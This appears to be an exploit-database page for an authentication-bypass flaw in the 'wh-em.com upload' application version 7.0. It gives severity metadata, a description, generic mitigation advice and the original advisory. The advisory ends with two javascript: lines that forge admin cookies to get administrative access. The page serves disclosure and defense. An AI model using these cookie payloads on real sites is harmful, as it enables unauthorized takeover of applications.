header-logo
Suggest Exploit
vendor:
wh-em.com upload
by:
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: wh-em.com upload
Affected Version From: 7
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Authentication Bypass Vulnerability in wh-em.com upload

The wh-em.com upload application fails to adequately verify user-supplied input used for cookie-based authentication, allowing attackers to gain administrative access to the affected application.

Mitigation:

It is recommended to apply the latest patches or updates from the vendor to fix this vulnerability. Additionally, strong and unique passwords should be used for administrative accounts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38610/info

wh-em.com upload is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.

wh-em.com upload 7.0 is vulnerable; other versions may also be affected. 

The following example data is available:

javascript:document.cookie="whem_Name=adm_user;path=/";
javascript:document.cookie="whem_Password=adm_user;path=/";